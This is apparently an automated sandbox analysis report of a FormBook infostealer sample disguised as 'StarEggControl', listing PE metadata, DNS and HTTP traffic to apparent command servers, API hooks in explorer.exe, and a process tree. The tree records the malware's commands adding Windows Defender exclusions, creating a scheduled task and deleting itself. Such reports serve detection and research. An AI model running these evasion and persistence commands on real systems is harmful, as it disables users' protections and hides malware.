add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb0684	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x482c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0668	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xae6dc	0xae800	False	0.80517997851	COM executable for DOS	7.5188778941	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x482c	0x4a00	False	0.918549408784	data	7.81051847098	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xb2130	0x4197	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0xb62c8	0x14	data
RT_VERSION	0xb62dc	0x364	data
RT_MANIFEST	0xb6640	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2019
Assembly Version	1.0.0.0
InternalName	InvalidCastException.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	StarEggControl
ProductVersion	1.0.0.0
FileDescription	StarEggControl
OriginalFilename	InvalidCastException.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/04/21-18:02:46.816027	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49717	34.102.136.180	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 18:02:46.634438038 CEST	49717	80	192.168.2.5	34.102.136.180
May 4, 2021 18:02:46.675184965 CEST	80	49717	34.102.136.180	192.168.2.5
May 4, 2021 18:02:46.677416086 CEST	49717	80	192.168.2.5	34.102.136.180
May 4, 2021 18:02:46.677593946 CEST	49717	80	192.168.2.5	34.102.136.180
May 4, 2021 18:02:46.719705105 CEST	80	49717	34.102.136.180	192.168.2.5
May 4, 2021 18:02:46.816026926 CEST	80	49717	34.102.136.180	192.168.2.5
May 4, 2021 18:02:46.816056013 CEST	80	49717	34.102.136.180	192.168.2.5
May 4, 2021 18:02:46.816281080 CEST	49717	80	192.168.2.5	34.102.136.180
May 4, 2021 18:02:46.816380978 CEST	49717	80	192.168.2.5	34.102.136.180
May 4, 2021 18:02:46.859430075 CEST	80	49717	34.102.136.180	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 18:00:49.907799959 CEST	49557	53	192.168.2.5	8.8.8.8
May 4, 2021 18:00:49.956352949 CEST	53	49557	8.8.8.8	192.168.2.5
May 4, 2021 18:00:51.020155907 CEST	61733	53	192.168.2.5	8.8.8.8
May 4, 2021 18:00:51.071681023 CEST	53	61733	8.8.8.8	192.168.2.5
May 4, 2021 18:00:51.750638962 CEST	65447	53	192.168.2.5	8.8.8.8
May 4, 2021 18:00:51.804084063 CEST	53	65447	8.8.8.8	192.168.2.5
May 4, 2021 18:00:52.373558044 CEST	52441	53	192.168.2.5	8.8.8.8
May 4, 2021 18:00:52.425172091 CEST	53	52441	8.8.8.8	192.168.2.5
May 4, 2021 18:00:54.343322992 CEST	62176	53	192.168.2.5	8.8.8.8
May 4, 2021 18:00:54.403337955 CEST	53	62176	8.8.8.8	192.168.2.5
May 4, 2021 18:00:55.471920967 CEST	59596	53	192.168.2.5	8.8.8.8
May 4, 2021 18:00:55.520484924 CEST	53	59596	8.8.8.8	192.168.2.5
May 4, 2021 18:00:56.800488949 CEST	65296	53	192.168.2.5	8.8.8.8
May 4, 2021 18:00:56.854403973 CEST	53	65296	8.8.8.8	192.168.2.5
May 4, 2021 18:01:00.374254942 CEST	63183	53	192.168.2.5	8.8.8.8
May 4, 2021 18:01:00.422900915 CEST	53	63183	8.8.8.8	192.168.2.5
May 4, 2021 18:01:01.839873075 CEST	60151	53	192.168.2.5	8.8.8.8
May 4, 2021 18:01:01.897089005 CEST	53	60151	8.8.8.8	192.168.2.5
May 4, 2021 18:01:03.932302952 CEST	56969	53	192.168.2.5	8.8.8.8
May 4, 2021 18:01:03.983825922 CEST	53	56969	8.8.8.8	192.168.2.5
May 4, 2021 18:01:18.462794065 CEST	55161	53	192.168.2.5	8.8.8.8
May 4, 2021 18:01:18.521301985 CEST	53	55161	8.8.8.8	192.168.2.5
May 4, 2021 18:01:43.801347017 CEST	54757	53	192.168.2.5	8.8.8.8
May 4, 2021 18:01:43.855362892 CEST	53	54757	8.8.8.8	192.168.2.5
May 4, 2021 18:02:46.423053026 CEST	49992	53	192.168.2.5	8.8.8.8
May 4, 2021 18:02:46.627899885 CEST	53	49992	8.8.8.8	192.168.2.5
May 4, 2021 18:03:06.997164011 CEST	60075	53	192.168.2.5	8.8.8.8
May 4, 2021 18:03:07.055994034 CEST	53	60075	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 4, 2021 18:02:46.423053026 CEST	192.168.2.5	8.8.8.8	0xe039	Standard query (0)	www.safifinancial.info	A (IP address)	IN (0x0001)
May 4, 2021 18:03:06.997164011 CEST	192.168.2.5	8.8.8.8	0x87eb	Standard query (0)	www.4980057280880200.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 4, 2021 18:02:46.627899885 CEST	8.8.8.8	192.168.2.5	0xe039	No error (0)	www.safifinancial.info	safifinancial.info		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 18:02:46.627899885 CEST	8.8.8.8	192.168.2.5	0xe039	No error (0)	safifinancial.info		34.102.136.180	A (IP address)	IN (0x0001)
May 4, 2021 18:03:07.055994034 CEST	8.8.8.8	192.168.2.5	0x87eb	Name error (3)	www.4980057280880200.xyz	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.safifinancial.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49717	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 4, 2021 18:02:46.677593946 CEST	1301	OUT	GET /op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX HTTP/1.1 Host: www.safifinancial.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 4, 2021 18:02:46.816026926 CEST	1302	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 04 May 2021 16:02:46 GMT Content-Type: text/html Content-Length: 275 ETag: "6089beab-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE3
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE3
GetMessageW	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE3
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE3

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Ms5nQdSz5l.exe PID: 3560 Parent PID: 5620

General

Start time:	18:00:56
Start date:	04/05/2021
Path:	C:\Users\user\Desktop\Ms5nQdSz5l.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
Imagebase:	0xc40000
File size:	734720 bytes
MD5 hash:	BA01DF16E4C876E078348FD4479A8FDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 6188 Parent PID: 3560

General

Start time:	18:01:00
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
Imagebase:	0x9a0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6196 Parent PID: 6188

General

Start time:	18:01:01
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6208 Parent PID: 3560

General

Start time:	18:01:01
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
Imagebase:	0x9a0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6260 Parent PID: 6208

General

Start time:	18:01:01
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6268 Parent PID: 3560

General

Start time:	18:01:01
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'
Imagebase:	0x20000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6316 Parent PID: 6268

General

Start time:	18:01:02
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6424 Parent PID: 3560

General

Start time:	18:01:02
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
Imagebase:	0x9a0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6444 Parent PID: 6424

General

Start time:	18:01:03
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff797770000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Ms5nQdSz5l.exe PID: 6452 Parent PID: 3560

General

Start time:	18:01:03
Start date:	04/05/2021
Path:	C:\Users\user\Desktop\Ms5nQdSz5l.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Ms5nQdSz5l.exe
Imagebase:	0x620000
File size:	734720 bytes
MD5 hash:	BA01DF16E4C876E078348FD4479A8FDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 6452

General

Start time:	18:01:07
Start date:	04/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mstsc.exe PID: 2196 Parent PID: 3472

General

Start time:	18:02:03
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mstsc.exe
Imagebase:	0xc70000
File size:	3444224 bytes
MD5 hash:	2412003BE253A515C620CE4890F3D8F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6848 Parent PID: 2196

General

Start time:	18:02:08
Start date:	04/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
Imagebase:	0xa0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6804 Parent PID: 6848

General

Start time:	18:02:09
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Ms5nQdSz5l.exe PID: 3560 Parent PID: 5620 Ms5nQdSz5l.exeCOMMON

Executed Functions

Function 01816B80, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01816BF0
GetCurrentThread.KERNEL32 ref: 01816C2D
GetCurrentProcess.KERNEL32 ref: 01816C6A
GetCurrentThreadId.KERNEL32 ref: 01816CC3

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3243c2150b35f0302d1daa2686c53b2c9c6fb77dfb6158bee74655afdb375b87
Instruction ID: ea3da3823b3a9a44cf44106b12bb8aec68b34d77e8893b911e94bdc7c3444276
Opcode Fuzzy Hash: 3243c2150b35f0302d1daa2686c53b2c9c6fb77dfb6158bee74655afdb375b87
Instruction Fuzzy Hash: 765164B4E007898FDB15CFA9DA88B9EBBF4FF49304F208459E018A7391D7745988CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01816B90, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01816BF0
GetCurrentThread.KERNEL32 ref: 01816C2D
GetCurrentProcess.KERNEL32 ref: 01816C6A
GetCurrentThreadId.KERNEL32 ref: 01816CC3

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 510b0a804ca2c5f9f7c584133e9ae802321ace40d9751c7dedef18c65ab8af35
Instruction ID: 9067970a7ca58eff27ef17b8005c6f7a74ffe065a615c71bfb14f0e0d2a4c7b5
Opcode Fuzzy Hash: 510b0a804ca2c5f9f7c584133e9ae802321ace40d9751c7dedef18c65ab8af35
Instruction Fuzzy Hash: 225153B4E006498FDB14CFA9D54879EBBF4FF49304F208459E019A3390D7745948CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0181BBB8, Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0181BE0E

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 15be68162dc5d4e74484a4efea0c87c8ca7227a2038efa24675476f4d59cb525
Instruction ID: 6bcb24edf58b9099eeffd2466972dee0c77ead9eed435037554675b14319b09e
Opcode Fuzzy Hash: 15be68162dc5d4e74484a4efea0c87c8ca7227a2038efa24675476f4d59cb525
Instruction Fuzzy Hash: A5711271A00B058FD724CF2AC45176ABBF5FF88304F00892DD59ADBA44DB35E9498F91

Uniqueness

Uniqueness Score: -1.00%

Function 0181DC78, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0181DD8A

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c1cb81f527372f2f8caeae883d2cb01818939517ae899bd52158a892900a4c43
Instruction ID: 215c23ef2c28442cff456e5fe5f9c1b41571f55ffffe674efe648ad7379c8d28
Opcode Fuzzy Hash: c1cb81f527372f2f8caeae883d2cb01818939517ae899bd52158a892900a4c43
Instruction Fuzzy Hash: 8E41C0B1D003589FDB14CFD9C884ADEBBB5BF48314F64822AE819AB214D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01816D41, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01816E3F

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d39d650bbfb12fee72cde3b55033e28eee43ec9d79aaff98b057928da9c5bb1c
Instruction ID: 5918355921b2d231f2390b87fafea54256356e7dc48009997f71de878f233b35
Opcode Fuzzy Hash: d39d650bbfb12fee72cde3b55033e28eee43ec9d79aaff98b057928da9c5bb1c
Instruction Fuzzy Hash: 56411676900249AFCB01CF99D844AEEBFF9FF89310F14806AEA54E7210D7759A54DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01816DB0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01816E3F

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: abeffbfb8018a7580c0a7f98c949c335c94faf15ec690f5ac84ba7e810f341c4
Instruction ID: d0cf6662fa3c013d4edd7e8583d4213bdabd6ad6d00363028a6050906a59ee4c
Opcode Fuzzy Hash: abeffbfb8018a7580c0a7f98c949c335c94faf15ec690f5ac84ba7e810f341c4
Instruction Fuzzy Hash: 8E21F4B59002489FDB10CFA9D584AEEBBF4FF48314F24801AE954A3210D378A945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01816DB8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01816E3F

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dbcf7f1d9eed482023d040395d2ac1c36d6a0c1b6240e7baaa94332a69cf01dc
Instruction ID: 379149db153005cbac3dd59f9d9553dcaaf66b338ccbf42fdb95ed5804cd91ec
Opcode Fuzzy Hash: dbcf7f1d9eed482023d040395d2ac1c36d6a0c1b6240e7baaa94332a69cf01dc
Instruction Fuzzy Hash: CB21C4B59002489FDB10CFA9D984ADEBBF8FB48324F14841AE954B3310D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0181B0D8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0181BE89,00000800,00000000,00000000), ref: 0181C09A

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e0e1baf65632bdcd3dca8440492aad76eccb7154469187dd9d132a108096196d
Instruction ID: 7f33ed7dd2867dc941c14838cfc1cb655ac83a0bbe94319ff71c1e1b7489e002
Opcode Fuzzy Hash: e0e1baf65632bdcd3dca8440492aad76eccb7154469187dd9d132a108096196d
Instruction Fuzzy Hash: E81103B6D003489FDB14CF9AC444B9EBBF8EB89314F14842AE915B7200C375AA49CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0181C028, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0181BE89,00000800,00000000,00000000), ref: 0181C09A

Memory Dump Source

Source File: 00000000.00000002.243703036.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: eeab817d84ea207a3675854f0dfba94a91058e8abd3d2f2e04914c77f0574758
Instruction ID: 7d9c734b0ed86276a9a51950c0a5412e7b0719737026604673d351a258ed2d3a
